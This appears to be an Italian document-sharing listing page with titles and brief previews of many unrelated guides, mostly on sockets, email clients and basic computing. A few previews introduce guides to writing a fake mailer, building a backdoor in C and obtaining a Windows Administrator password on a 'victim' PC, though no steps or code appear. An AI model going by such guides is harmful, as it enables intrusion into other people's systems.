Scrivere un fake mailer in Visual Basic. La parte della guida di Lord Shinva sulle Fake Mail Scrivere un fake mailer in Visual Basic Tutti noi, all'inizio abbiamo letto la famosa guida all'hacking di Lord Shinva. Altra cosa certa è che tutti noi sappiamo la quasi inutilità di questa guida... La

Dettagli

I Socket. Laboratorio Software 2008-2009 M. Grotto R. Farina

I Socket. Laboratorio Software 2008-2009 M. Grotto R. Farina M. Grotto R. Farina Sommario 1. Applicazioni Distribuite 2. I Socket Introduzione Interfacce e protocolli Descrizione Stile di comunicazione Namespace e protocollo Include e system call Creazione e chiusura

Dettagli

Esercitazione Laboratorio di Sistemi Operativi 20-01-2014. Cognome Nome Mat.

Esercitazione Laboratorio di Sistemi Operativi 20-01-2014. Cognome Nome Mat. Il compito è costituito da domande chiuse e domande aperte. Non è consentito l uso di libri, manuali, appunti., etc. Tempo massimo 2 ore. Domande chiuse: ogni domanda corrisponde ad un punteggio di 1 punto

Dettagli

- 1 reference coded [1,06% Coverage]

<Documents\bo_min_1_M_18_ita_stu> - 1 reference coded [1,06% Coverage] - 1 reference coded [1,06% Coverage] Reference 1-1,06% Coverage Ti lega il computer? Sì. Io l ho sempre detto. Io ho una visione personale. Anche quelli che vanno a cercare

Dettagli

1. Il nome utente: NON può essere modificato 2. Il tuo nome (ne trovate prescritto uno generico): metti il tuo vero nome SENZA il cognome

1. Il nome utente: NON può essere modificato 2. Il tuo nome (ne trovate prescritto uno generico): metti il tuo vero nome SENZA il cognome Guida NetPupils Un social network è un sito che dà la possibilità alle persone di entrare in contatto e condividere informazioni. I social network si basano su quella che viene definita amicizia : concedendo

Dettagli

Installare Windows Xp Guida scritta da CroX

Installare Windows Xp Guida scritta da CroX Installare Windows Xp Guida scritta da CroX INTRODUZIONE: 2 PREPARAZIONE 2 BOOT DA CD 2 BIOS 3 PASSAGGI FONDAMENTALI 4 SCEGLIERE COSA FARE TRA RIPRISTINO O INSTALLARE UNA NUOVA COPIA 5 ACCETTARE CONTRATTO

Dettagli

Socket. Nei sistemi operativi moderni i servizi disponibili in rete si basano principalmente sul modello client/server.

Socket. Nei sistemi operativi moderni i servizi disponibili in rete si basano principalmente sul modello client/server. Socket Nei sistemi operativi moderni i servizi disponibili in rete si basano principalmente sul modello client/server. Tale architettura consente ai sistemi di condividere risorse e cooperare per il raggiungimento

Dettagli

PC Crash Course: OBIETTIVI

PC Crash Course: OBIETTIVI PC Crash Course: OBIETTIVI 1. PC: uno strumento 2. Microsoft Windows XP: alcuni concetti chiave della interfaccia grafica 3. File System: file, direttori, link, 4. Il prompt dei comandi 5. Un occhiata

Dettagli

- 1 reference coded [0,86% Coverage]

<Documents\bo_min_9_M_18_ita_stu> - 1 reference coded [0,86% Coverage] - 1 reference coded [0,86% Coverage] Reference 1-0,86% Coverage E le altre funzioni, le fotografie, o, non so le altre cose che può offrire il cellulare sono cose che

Dettagli

COMUNICAZIONE TRA PROCESSI REMOTI IN UNIX

COMUNICAZIONE TRA PROCESSI REMOTI IN UNIX A cura del prof. Gino Tombolini 1 COMUNICAZIONE TRA PROCESSI REMOTI IN UNIX Il sistema UNIX TCP/IP fornisce un meccanismo di comunicazione tra processi residenti su nodi distinti di una rete, compatibili

Dettagli

rsystem Maximiliano Marchesi maximiliano.marchesi@studenti.unipr.it

rsystem Maximiliano Marchesi maximiliano.marchesi@studenti.unipr.it Maximiliano Marchesi 28 Settembre 2005 Diario delle Revisioni Revisione 1.2 28 Settembre 2005 maximiliano.marchesi@studenti.unipr.it Sommario Introduzione..................................................................................

Dettagli

DOMANDA APERTA: COSA TI PIACE DEL CELLULARE a me del cellulare piace tutto a me il cellulare non piace ma in alcune occasioni, per esempio se fai un

DOMANDA APERTA: COSA TI PIACE DEL CELLULARE a me del cellulare piace tutto a me il cellulare non piace ma in alcune occasioni, per esempio se fai un a me del cellulare piace a me il cellulare non piace ma in alcune occasioni, per esempio se fai un incidente è molto utile a me il cellulare piace ma me lo prendono solo a 12 anni. La cosa più bella è

Dettagli

Laboratorio di Sistemi Operativi 29-01-2009. Cognome Nome Mat.

Laboratorio di Sistemi Operativi 29-01-2009. Cognome Nome Mat. Il compito è costituito da domande chiuse, domande aperte ed esercizi. Non è consentito l uso di libri, manuali, appunti., etc. Tempo massimo 2 ore. Domande chiuse: ogni domanda corrisponde ad un punteggio

Dettagli

- 1 reference coded [1,02% Coverage]

<Documents\bo_min_2_M_17_ita_stu> - 1 reference coded [1,02% Coverage] - 1 reference coded [1,02% Coverage] Reference 1-1,02% Coverage Sì, adesso puoi fare i filmati, quindi alla fine se non hai niente da fare passi anche un ora al cellulare

Dettagli

Socket TCP. prima parte

Socket TCP. prima parte Socket TCP prima parte Cosa cambia: socket int fd = socket(pf_inet, SOCK_STREAM, 0); if (fd

Dettagli

Guida di apprendimento degli studenti. Social Networking W W W. M Y P A S T M Y P R E S E N T - I T. E U 1

Guida di apprendimento degli studenti. Social Networking W W W. M Y P A S T M Y P R E S E N T - I T. E U 1 M I O PA S S AT O M I O P R E S E N T E W W W. M Y P A S T M Y P R E S E N T - I T. E U Guida di apprendimento degli studenti Social Networking W W W. M Y P A S T M Y P R E S E N T - I T. E U 1 2 M I O

Dettagli

La Domanda Perfetta Scopri Subito Chi ti Mente

La Domanda Perfetta Scopri Subito Chi ti Mente La Domanda Perfetta Scopri Subito Chi ti Mente Una tecnica di Persuasore Segreta svelata dal sito www.persuasionesvelata.com di Marcello Marchese Copyright 2010-2011 1 / 8 www.persuasionesvelata.com Sommario

Dettagli

Maschere a Venezia CAP I

Maschere a Venezia CAP I Maschere a Venezia 7 CAP I In un pomeriggio di fine marzo Altiero Ranelli, un giovane giornalista de Il Gazzettino di Venezia, entra nell ufficio del direttore. - Ho una grande notizia. - grida contento.

Dettagli

INDICE PROGRAMMA CORSO

INDICE PROGRAMMA CORSO INDICE PROGRAMMA CORSO PRIMA LEZIONE: Componenti di un computer: Hardware, Software e caratteristiche delle periferiche. SECONDA LEZIONE: Elementi principali dello schermo di Windows: Desktop, Icone, Mouse,

Dettagli

Guida all'installazione Stellar OST to PST Converter 5.0

Guida all'installazione Stellar OST to PST Converter 5.0 Guida all'installazione Stellar OST to PST Converter 5.0 1 Introduzione Stellar OST to PST Converter vi offrirà una soluzione completa alla conversione di file OST in file Microsoft Outlook Personal Storage

Dettagli

Le storie di. Alcuni 2011 - Tutti i diritti sono riservati

Le storie di. Alcuni 2011 - Tutti i diritti sono riservati Le storie di Alcuni 2011 - Tutti i diritti sono riservati 1 Un messaggio scontato FIRENZE, IN UN POMERIGGIO D INVERNO. MATILDE È NELLA SUA CAMERA. Uffa! Ma quando finiscono questi compiti? Sono quasi le

Dettagli

Cenni di programmazione distribuita in C++ Mauro Piccolo piccolo@di.unito.it

Cenni di programmazione distribuita in C++ Mauro Piccolo piccolo@di.unito.it Cenni di programmazione distribuita in C++ Mauro Piccolo piccolo@di.unito.it Socket Nei sistemi operativi moderni i servizi disponibili in rete si basano principalmente sul modello client/server. Tale

Dettagli

Esercitazione [6] Client/Server con Socket

Esercitazione [6] Client/Server con Socket Esercitazione [6] Client/Server con Socket Leonardo Aniello - aniello@dis.uniroma1.it Daniele Cono D'Elia - delia@dis.uniroma1.it Sistemi di Calcolo - Secondo modulo (SC2) Programmazione dei Sistemi di

Dettagli

La felicità per me è un sinonimo del divertimento quindi io non ho un obiettivo vero e proprio. Spero in futuro di averlo.

La felicità per me è un sinonimo del divertimento quindi io non ho un obiettivo vero e proprio. Spero in futuro di averlo. Riflessioni sulla felicità.. Non so se sto raggiungendo la felicità, di certo stanno accadendo cose che mi rendono molto più felice degli anni passati. Per me la felicità consiste nel stare bene con se

Dettagli

Racconti visioni e libri per rospi da baciare

Racconti visioni e libri per rospi da baciare febbraio 2008 Cari bambini e ragazzi che verrete al festival chiamato AIUTO, STO CAMBIANDO! Racconti visioni e libri per rospi da baciare a Cagliari dall 8 all 11 ottobre 2009 NOTA: questa la lettera originale,

Dettagli

Cosa ti porti a casa?

Cosa ti porti a casa? 8. L o p i n i o n e d e i r a g a z z i e d e l l e r a g a z z e Cosa ti porti a casa? A conclusione dell incontro di restituzione è stato richiesto ai ragazzi di riportare in forma anonima una valutazione

Dettagli

Guida utente Lantailor HOME

Guida utente Lantailor HOME Guida utente Lantailor HOME Introduzione Requisiti di sistema e installazione Versione demo e attivazione del programma Impostazione iniziale della password Selezione delle limitazioni Segnalazione della

Dettagli

LA SICUREZZA INFORMATICA SU INTERNET LE MINACCE

LA SICUREZZA INFORMATICA SU INTERNET LE MINACCE LE MINACCE I rischi della rete (virus, spyware, adware, keylogger, rootkit, phishing, spam) Gli attacchi per mezzo di software non aggiornato La tracciabilità dell indirizzo IP pubblico. 1 LE MINACCE I

Dettagli

Funzioni di base. Manualino OE6. Outlook Express 6

Funzioni di base. Manualino OE6. Outlook Express 6 Manualino OE6 Microsoft Outlook Express 6 Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica. È gratuito,

Dettagli

Tecnica per help desk remoto

Tecnica per help desk remoto Tecnica per help desk remoto Guida scritta da Stefano Coletta (Creator) il 5 ottobre 2003 Contattatemi a creator@mindcreations.com o visitando http://www.mindcreations.com In breve Una soluzione multipiattaforma,

Dettagli

Una semplice applicazione client/server 1

Una semplice applicazione client/server 1 Una semplice applicazione client/server 1 Il nostro obiettivo In questa parte del corso implementeremo un applicazione client/server che usa i socket Internet disponibili nei sistemi Unix/Linux. Nello

Dettagli

OUTLOOK EXPRESS CORSO AVANZATO

OUTLOOK EXPRESS CORSO AVANZATO Pagina 1 di 9 OUTLOOK EXPRESS CORSO AVANZATO Prima di tutto non fatevi spaventare dalla parola avanzato, non c è nulla di complicato in express e in ogni caso vedremo solo le cose più importanti. Le cose

Dettagli

Utilizzo di MioNet. 2008 Western Digital Technologies Inc. Manuale utente MioNet Versione 1.08

Utilizzo di MioNet. 2008 Western Digital Technologies Inc. Manuale utente MioNet Versione 1.08 Utilizzo di MioNet 1 Avviso di Copyright Non è consentito riprodurre, trasmettere, trascrivere, archiviare in un sistema di recupero, o tradurre in qualunque linguaggio, umano o informatico, in qualunque

Dettagli

~~~~~~~~~~~~~~~~~~~~~~~~ C:WINDOWS>netstat. Active Connections

~~~~~~~~~~~~~~~~~~~~~~~~ C:WINDOWS>netstat. Active Connections Indice dei contenuti: INTRODUZIONE I. Uso di Netstat II. Individuazione delle porte aperte III. SYN e ACK IV. Usando Netstat per ICQ e AIM V. Altri usi VI. strumenti e accessori VII. Due trucchi veloci

Dettagli

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a:

Talento LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) L'UTILIZZO DI ALTRI SERVIZI INTERNET. In questa lezione imparerete a: Lab 4.1 Utilizzare FTP (File Tranfer Protocol) LAB 4.1 - UTILIZZARE FTP (FILE TRANSFER PROTOCOL) In questa lezione imparerete a: Utilizzare altri servizi Internet, Collegarsi al servizio Telnet, Accedere

Dettagli

By E.M. note sull'uso di GAMBAS

By E.M. note sull'uso di GAMBAS By E.M. note sull'uso di GAMBAS GAMBAS viene installato sotto Xubuntu nella directory: /usr/share/gambas2 link problema su uso dell'esempio SerialPort http://gambasrad.org/zforum/view_topic?topic_id=1057

Dettagli

MINI GUIDA PER NAVIGARE SICURI NEL WEB CLASSI 5 A 5 B SCUOLA PRIMARIA DI LIBANO ANNO SCOLASTICO 2012-2013

MINI GUIDA PER NAVIGARE SICURI NEL WEB CLASSI 5 A 5 B SCUOLA PRIMARIA DI LIBANO ANNO SCOLASTICO 2012-2013 MINI GUIDA PER NAVIGARE SICURI NEL WEB CLASSI 5 A 5 B SCUOLA PRIMARIA DI LIBANO ANNO SCOLASTICO 2012-2013 1 CHE COS È INTERNET? INTERNET (connessione di rete) E' la "rete delle reti" perché collega fra

Dettagli

Come Lavorare in Rugbystories.it

Come Lavorare in Rugbystories.it Come Lavorare in Rugbystories.it Una guida per i nuovi arrivati IL PUNTO DI PARTENZA PER I NUOVI ARRIVATI E UN PUNTO DI RITORNO PER CHI NON RICORDA DA DOVE E ARRIVATO. 1 Come Lavorare in Rugbystories.it

Dettagli

Manca un programma importante

Manca un programma importante Manca un programma importante Finalmente, dopo tutte le volte che si è notato che un programma che vorremmo usare manca, impareremo ad installare nuovi pacchetti in modo molto semplice. Si è già detto

Dettagli

CIAO A TUTTI, Qui troverete pressapoco una guida per usare uno SCRIPT

CIAO A TUTTI, Qui troverete pressapoco una guida per usare uno SCRIPT INDICE Come si presenta lo Script...................... 3 Opzioni dello Script.......................... 4 Categoria Connetti...........................5 Categoria Servers........................... 6

Dettagli

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali CORSO EDA Informatica di base Sicurezza, protezione, aspetti legali Rischi informatici Le principali fonti di rischio di perdita/danneggiamento dati informatici sono: - rischi legati all ambiente: rappresentano

Dettagli

V 1.00b. by ReBunk. per suggerimenti e critiche mi trovate nell hub locarno.no-ip.org. Guida di base IDC ++1.072

V 1.00b. by ReBunk. per suggerimenti e critiche mi trovate nell hub locarno.no-ip.org. Guida di base IDC ++1.072 V 1.00b by ReBunk per suggerimenti e critiche mi trovate nell hub locarno.no-ip.org Guida di base IDC ++1.072 Thanks To SicKb0y (autore del idc++) staff (per sopportarmi tutti i giorni) Versione definitiva

Dettagli

============================================================================

============================================================================ problema con DynDNS Postato da - 2008/04/20 22:28 ciao a tutti. Sto cercando di installare DynDNS ma non riesco a farlo. Ho un abbonamento Alice. Quando inserisco i parametri ri chiesti durante la sua

Dettagli

INSTALLAZIONE JOOMLA SU SPAZIO WEB FREE ALTERVISTA

INSTALLAZIONE JOOMLA SU SPAZIO WEB FREE ALTERVISTA INSTALLAZIONE JOOMLA SU SPAZIO WEB FREE ALTERVISTA Questa vuole essere una breve tutorial su come installare Joomla su uno spazio Web gratuito, in particolare faremo riferimento ai sottodomini gratuitamente

Dettagli

''I 5 Passi per Dupplicare il modo di fare Network Marketing'' ---> 5) lezione: ''Come Ottimizzare la tua Presenza in facebook e nei Gruppi''

''I 5 Passi per Dupplicare il modo di fare Network Marketing'' ---> 5) lezione: ''Come Ottimizzare la tua Presenza in facebook e nei Gruppi'' J.AThePowerOfSponsorship Di Giuseppe Angioletti http://www.segretidei7uero.altervista.org ''I 5 Passi per Dupplicare il modo di fare Network Marketing'' ---> 5) lezione: ''Come Ottimizzare la tua Presenza

Dettagli

Esempio 1: stampa locale di file remoto

Esempio 1: stampa locale di file remoto Alcuni esempi di uso di Socket Esempio 1: stampa locale di file remoto Visualizzazione locale del contenuto di un file remoto. Il client deve richiedere la creazione della connessione e successivamente

Dettagli

Sponsorizzazione. Puoi distribuire liberamente questo PDF al Tuo Team e alla Tua Downline se ritieni utile queste informazioni senza modificarlo.

Sponsorizzazione. Puoi distribuire liberamente questo PDF al Tuo Team e alla Tua Downline se ritieni utile queste informazioni senza modificarlo. Sponsorizzazione Magica www.sponsorizzazionemagica.com Bonus Speciale Obiezioni: Come Gestire FACILMENTE le obiezioni dei Tuoi Contatti Puoi distribuire liberamente questo PDF al Tuo Team e alla Tua Downline

Dettagli

Creazione di un archivio storico. locale e remoto. nelle 24 ore giornaliere

Creazione di un archivio storico. locale e remoto. nelle 24 ore giornaliere Creazione di un archivio storico locale e remoto nelle 24 ore giornaliere Sommario Prefazione... 2 Procedura... 3 Comandi file batch... 5 Creazione Archivio Globale... 6 Cancellazione e creazione foto

Dettagli

Creare un'elementare backdoor in C in ambiente UNIX

Creare un'elementare backdoor in C in ambiente UNIX Creare un'elementare backdoor in C in ambiente UNIX DISCLAIMER: Questo tutorial è a solo scopo didattico. L'autore NON si prende alcuna responsabilità circa usi errati o non legali delle informazioni qui

Dettagli

Italian Continuers (Section I Listening and Responding) Transcript

Italian Continuers (Section I Listening and Responding) Transcript 2013 H I G H E R S C H O O L C E R T I F I C A T E E X A M I N A T I O N Italian Continuers (Section I Listening and Responding) Transcript Familiarisation Text SILVIO: FLAVIA: SILVIO: FLAVIA: SILVIO:

Dettagli

Downlovers.it: registriamoci e scarichiamo il nostro primo brano.

Downlovers.it: registriamoci e scarichiamo il nostro primo brano. Downlovers.it: registriamoci e scarichiamo il nostro primo brano. Tutorial realizzato da Domenico A. Di Renzo il 12 dicembre 2008 (versione 1.0) Il documento originale si trova su: www.musicapuntoamici.com

Dettagli

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15 Entrare in un pc è una espressione un po generica...può infatti significare più cose: - Disporre di risorse, quali files o stampanti, condivise, rese fruibili liberamente o tramite password con i ripettivi

Dettagli

Internet in due parole

Internet in due parole Internet in due parole Versione 1.1 18-9-2002 INTERNET IN DUE PAROLE...1 VERSIONE 1.1 18-9-2002...1 COSA È INTERNET?... 2 TIPI DI CONNESSIONE.... 2 Cosa è un modem...2 ADSL...2 Linee dedicate...2 CONNESSIONE

Dettagli

Pannello controllo Web www.smsdaweb.com. Il Manuale

Pannello controllo Web www.smsdaweb.com. Il Manuale Pannello controllo Web www.smsdaweb.com Il Manuale Accesso alla piattaforma Accesso all area di spedizione del programma smsdaweb.com avviene tramite ingresso nel sistema via web come se una qualsiasi

Dettagli

CONSIGLI PER GIOVANI NAVIGANTI (anche già navigati).

CONSIGLI PER GIOVANI NAVIGANTI (anche già navigati). CONSIGLI PER GIOVANI NAVIGANTI (anche già navigati). HEY! SONO QUI! (Ovvero come cerco l attenzione). Farsi notare su internet può essere il tuo modo di esprimerti. Essere apprezzati dagli altri è così

Dettagli

QUESTIONARIO SULLE DIPENDENZE da MEZZI TECNOLOGICI. elaborato dagli alunni della 3E a.s. 2012-2013

QUESTIONARIO SULLE DIPENDENZE da MEZZI TECNOLOGICI. elaborato dagli alunni della 3E a.s. 2012-2013 QUESTIONARIO SULLE DIPENDENZE da MEZZI TECNOLOGICI elaborato dagli alunni della 3E a.s. 2012-2013 F= risposta degli alunni/figli G = risposta dei genitori F: 1- Cosa pensi della dipendenza elettronica?

Dettagli

Interazione (TCP) Client-Server con le socket

Interazione (TCP) Client-Server con le socket Interazione (TCP) Client-Server con le socket D. Gendarmi Interazione TCP Client/Server Server 2. Assegnare un local address alla socket 3. Settare la socket all ascolto 4. Iterativamente: a. Accettare

Dettagli

CONFIGURATION MANUAL

CONFIGURATION MANUAL RELAY PROTOCOL CONFIGURATION TYPE CONFIGURATION MANUAL Copyright 2010 Data 18.06.2013 Rev. 1 Pag. 1 of 15 1. ENG General connection information for the IEC 61850 board 3 2. ENG Steps to retrieve and connect

Dettagli

Due Metodi per ricaricare il vostro cellulare Tim, Vodafone e Wind gratis

Due Metodi per ricaricare il vostro cellulare Tim, Vodafone e Wind gratis Due Metodi per ricaricare il vostro cellulare Tim, Vodafone e Wind gratis Ciao, ti sei aggiudicato una guida per effettuare ricariche sul tuo cellulare gratis, Il metodo è molto semplice ed e tutto fattibile

Dettagli

Riepilogo Vedi le risposte complete

Riepilogo Vedi le risposte complete 1 di 11 risposte Riepilogo Vedi le risposte complete 1. Quanti anni hai? 12 anni 77 16% 13 anni 75 16% 14 anni 134 28% 15 anni 150 32% 16 anni 27 6% Other 8 2% 2. Quale scuola stai frequentando? Medie

Dettagli

Funzionamento del protocollo FTP

Funzionamento del protocollo FTP Alunno:Zamponi Claudio Numero matricola:4214118 Corso: Ingegneria Informatica Funzionamento del protocollo FTP L'FTP, acronimo di File Transfert Protocol (protocollo di trasferimento file), è uno dei protocolli

Dettagli

Controllo remoto di SPEEDY

Controllo remoto di SPEEDY UNIVERSITÀ DI BRESCIA FACOLTÀ DI INGEGNERIA Dipartimento di Elettronica per l Automazione Laboratorio di Robotica Avanzata Advanced Robotics Laboratory Corso di Robotica (Prof. Riccardo Cassinis) Controllo

Dettagli

Manuale Utente. Contents. Your journey, Our technology. 6. Come aggiornare le mappe 6. 1. Introduzione 2. 2. Installazione di Geosat Suite 2

Manuale Utente. Contents. Your journey, Our technology. 6. Come aggiornare le mappe 6. 1. Introduzione 2. 2. Installazione di Geosat Suite 2 Manuale Utente Contents 1. Introduzione 2 2. Installazione di Geosat Suite 2 3. Prima connessione 2 4. Operazioni Base 3 4.1 Come avviare la Suite 3 4.2 Come chiudere la Suite 4 4.3 Come cambiare la lingua

Dettagli

Web. Meglio chiedere

Web. Meglio chiedere Di cosa si tratta Sono molti coloro che si divertono a creare software particolari al solo scopo di causare danni più o meno gravi ai computer. Li spediscono per posta elettronica con messaggi allettanti

Dettagli

Come fare a leggere questi dati generati da un programma windows?

Come fare a leggere questi dati generati da un programma windows? Come fare a leggere questi dati generati da un programma windows? A questo punto siamo in possesso di tutti gli elementi per sfruttare appieno le potenzialità di Linux: sappiamo destreggiarci (mai abbastanza)

Dettagli

12.5 UDP (User Datagram Protocol)

12.5 UDP (User Datagram Protocol) CAPITOLO 12. SUITE DI PROTOCOLLI TCP/IP 88 12.5 UDP (User Datagram Protocol) L UDP (User Datagram Protocol) é uno dei due protocolli del livello di trasporto. Come l IP, é un protocollo inaffidabile, che

Dettagli

GUIDA ALL UTILIZZO DI MIRC

GUIDA ALL UTILIZZO DI MIRC GUIDA ALL UTILIZZO DI MIRC Vi illustrero molto brevemente come utilizzare mirc e sfruttare la sua sterminata e poca (purtroppo) conosciuta funzione di condivisione veloce e sicura (molto veloce)di qualsiasi

Dettagli

BENVENUTI ALLA SCUOLA T OSCANA!!!

BENVENUTI ALLA SCUOLA T OSCANA!!! Test your Italian This is the entrance test. Please copy and paste it in a mail and send it to info@scuola-toscana.com Thank you! BENVENUTI ALLA SCUOLA T OSCANA!!! TEST DI INGRESSO Data di inizio del corso...

Dettagli

La posta elettronica. ICT per la terza età Le video lezioni della Fondazione Mondo Digitale

La posta elettronica. ICT per la terza età Le video lezioni della Fondazione Mondo Digitale La posta elettronica ICT per la terza età Le video lezioni della Fondazione Mondo Digitale Diapositiva Introduzione Posta elettronica E mail Elettronica Posta In questo argomento del nostro corso impareremo

Dettagli

Laboratorio di Amministrazione di Sistema (CT0157) parte A : domande a risposta multipla

Laboratorio di Amministrazione di Sistema (CT0157) parte A : domande a risposta multipla Laboratorio di Amministrazione di Sistema (CT0157) parte A : domande a risposta multipla 1. Which are three reasons a company may choose Linux over Windows as an operating system? (Choose three.)? a) It

Dettagli

Quello Che Non Ti Dicono Sul Network Marketing

Quello Che Non Ti Dicono Sul Network Marketing Quello Che Non Ti Dicono Sul Network Marketing Ciao da Matteo Nodari di Network Marketing Top Strategy! Come ti dicevo il network marketing è uno dei settori più controversi e fraintesi di tutti i tempi.

Dettagli

Manuale ACDSee32. ACDSee32. Release 1.0.1

Manuale ACDSee32. ACDSee32. Release 1.0.1 ACDSee32 Release 1.0.1 Introduzione ACDSee32 è un ottimo (anzi, direi il migliore!) visualizzatore di immagini disponibile in commercio. In queste pagine spiego come installarlo e configurarlo a dovere,

Dettagli

Password di Administrator in Windows 2000, XP e NT

Password di Administrator in Windows 2000, XP e NT Password di Administrator in Windows 2000, XP e NT In questa guida impareremo a ottenere la password di Administrator in un sistema basato su Windows 2000 o XP. Materiale: PC vittima con Win 2000 o Xp

Dettagli

INTERNET EXPLORER. Breve manuale d'uso

INTERNET EXPLORER. Breve manuale d'uso INTERNET EXPLORER Breve manuale d'uso INDICE INTRODUZIONE... 3 COME IMPOSTARE LA PAGINA INIZIALE...3 LA WORK AREA... 3 LE VOCI DI MENU... 5 IL MENU FILE... 5 IL MENU MODIFICA... 6 IL MENU VISUALIZZA...

Dettagli

Guida rapida all installazione di NX7 per Windows

Guida rapida all installazione di NX7 per Windows Guida rapida all installazione di NX7 per Windows Lo scopo di questo documento é di fornire una guida sintetica all installazione della versione NX7 di Unigraphics. Alla fine di questo documento, potete

Dettagli

Una guida per avviare il tuo business e guadagnare online. chi non ha un lavoro, è precario, è in condizioni economiche difficili

Una guida per avviare il tuo business e guadagnare online. chi non ha un lavoro, è precario, è in condizioni economiche difficili COME PARTIRE Una guida per avviare il tuo business e guadagnare online Questo report si pone l obiettivo di dare una concreta speranza a chi non ha un lavoro, è precario, è in condizioni economiche difficili

Dettagli

User Guide Guglielmo SmartClient

User Guide Guglielmo SmartClient User Guide Guglielmo SmartClient User Guide - Guglielmo SmartClient Version: 1.0 Guglielmo All rights reserved. All trademarks and logos referenced herein belong to their respective companies. -2- 1. Introduction

Dettagli

17.2. Configurazione di un server di Samba

17.2. Configurazione di un server di Samba 17.2. Configurazione di un server di Samba Il file di configurazione di default (/etc/samba/smb.conf) consente agli utenti di visualizzare le proprie home directory di Red Hat Linux come una condivisione

Dettagli

GUIDA for SpeedFan. www.come123.altervista.org

GUIDA for SpeedFan. www.come123.altervista.org GUIDA for SpeedFan www.come123.altervista.org INDICE INTRODUZIONE PAGINA INIZIALE MENU DI CONFIGURAZIONE o Temperature o Ventole o Voltaggi o Velocità o Fan control o Opzioni o Log o Avanzate o Eventi

Dettagli

INTERNET EXPLORER Breve manuale d uso

INTERNET EXPLORER Breve manuale d uso INTERNET EXPLORER Breve manuale d uso INDICE INTRODUZIONE... 3 COME IMPOSTARE LA PAGINA INIZIALE... 3 LA WORK AREA... 3 LE VOCI DI MENU... 5 IL MENU FILE... 5 IL MENU MODIFICA... 6 IL MENU VISUALIZZA...

Dettagli

Ci relazioniamo dunque siamo

Ci relazioniamo dunque siamo 7_CECCHI.N 17-03-2008 10:12 Pagina 57 CONNESSIONI Ci relazioniamo dunque siamo Curiosità e trappole dell osservatore... siete voi gli insegnanti, mi insegnate voi, come fate in questa catastrofe, con il

Dettagli

Reference 1-0,73% Coverage

Reference 1-0,73% Coverage - 1 reference coded [0,73% Coverage] Reference 1-0,73% Coverage Dove ti piacerebbe andare ma anche vivere sì, sì. All interno dell Europa, sicuramente. Però mi piacerebbe vedere anche

Dettagli

Internet. Cos'è internet? I parte

Internet. Cos'è internet? I parte Internet Da leggere: Cap.6, in particolare par. 6.4 del Console Ribaudo (testo B) I parte Cos'è internet? Milioni di dispositivi di calcolo tra loro interconnessi: host o end-systems Pc, workstation, server

Dettagli

SMOOTHWALL EXPRESS Traduzione in Italiano TRADUZIONE DA INGLESE A ITALIANO DELLA GUIDA DI INSTALLAZIONE DI SMOOTHWALL EXPRESS 2.0.

SMOOTHWALL EXPRESS Traduzione in Italiano TRADUZIONE DA INGLESE A ITALIANO DELLA GUIDA DI INSTALLAZIONE DI SMOOTHWALL EXPRESS 2.0. TRADUZIONE DA INGLESE A ITALIANO DELLA GUIDA DI INSTALLAZIONE DI SMOOTHWALL EXPRESS 2.0 by kjamrio9 Il prodotto è sotto licenza GPL (Gnu Public License) e Open Source Software, per semplicità non riporto

Dettagli

IPC Inter Process Communication

IPC Inter Process Communication Il protocollo TCP controlla che la trasmissione tra due end points avvenga correttamente. Non stabilisce alcun criterio su chi deve iniziare la comunicazione. Questo compito è svolto dalle applicazioni

Dettagli

Lezione nr. 3. >> Le basi della tecnologia PHP per scrivere applicazioni per il web.

Lezione nr. 3. >> Le basi della tecnologia PHP per scrivere applicazioni per il web. Lezione nr. 3 >> Le basi della tecnologia PHP per scrivere applicazioni per il web. Ciao, spero tu abbia installato l editor di testo preferito o quello che ti ho consigliato e che tu sia riuscito a creare

Dettagli

Ultr@ VNC: Guida (parte 1)

Ultr@ VNC: Guida (parte 1) Ultr@ VNC: Guida (parte 1) Vi presento la guida in italiano per l installazione e l utilizzo di Ultra VNC :http://ultravnc.sourceforge.net. Le potenzialità del programma ve le abbiamo già presentate :http://www.femetal.it/9/ultravncrecensione,

Dettagli

Comandi di Rete. Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando

Comandi di Rete. Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando Comandi di Rete Principali Comandi di Rete. Verificare, testare ed analizzare da Riga di Comando PING: verifica la comunicazione tra due pc Il comando ping consente di verificare la connettività a livello

Dettagli

Navigare in Internet

Navigare in Internet Navigare in Internet Navigare in Internet Scopo del modulo Gli scopi del modulo consistono nel mettere in grado di : Usare particolari tipi di file e protocolli e di meccanismi di accesso remoto Usare

Dettagli

Esercitazione [5] Input/Output su Socket

Esercitazione [5] Input/Output su Socket Esercitazione [5] Input/Output su Socket Leonardo Aniello - aniello@dis.uniroma1.it Daniele Cono D'Elia - delia@dis.uniroma1.it Sistemi di Calcolo - Secondo modulo (SC2) Programmazione dei Sistemi di Calcolo

Dettagli

Stellar Phoenix Outlook PST Repair - Technical 5.0 Guida all'installazione

Stellar Phoenix Outlook PST Repair - Technical 5.0 Guida all'installazione Stellar Phoenix Outlook PST Repair - Technical 5.0 Guida all'installazione 1 Introduzione Stellar Phoenix Outlook PST Repair - Technical offre una completa soluzione per il ripristino dei dati da file

Dettagli

Corso di Outlook Express - Lezione 1

Corso di Outlook Express - Lezione 1 Corso di Outlook Express - Lezione 1 Questo testo fa parte di una serie di lezioni su Outlook Express realizzate nell'ambito della lista tecnica UICTech. Tutto il materiale confluira' in una pubblicazione

Dettagli

MODULE 4 BASIC IT SKILLS

MODULE 4 BASIC IT SKILLS MODULE 4 BASIC IT SKILLS Nel modulo 4 abbiamo preparato una guida per le competenze informatiche di base che condurrà passo dopo passo i principianti che vogliono imparare a usare Word e Internet o da

Dettagli

MySQL Controllare gli accessi alla base di dati A cura di Silvio Bonechi per http://www.pctrio.com

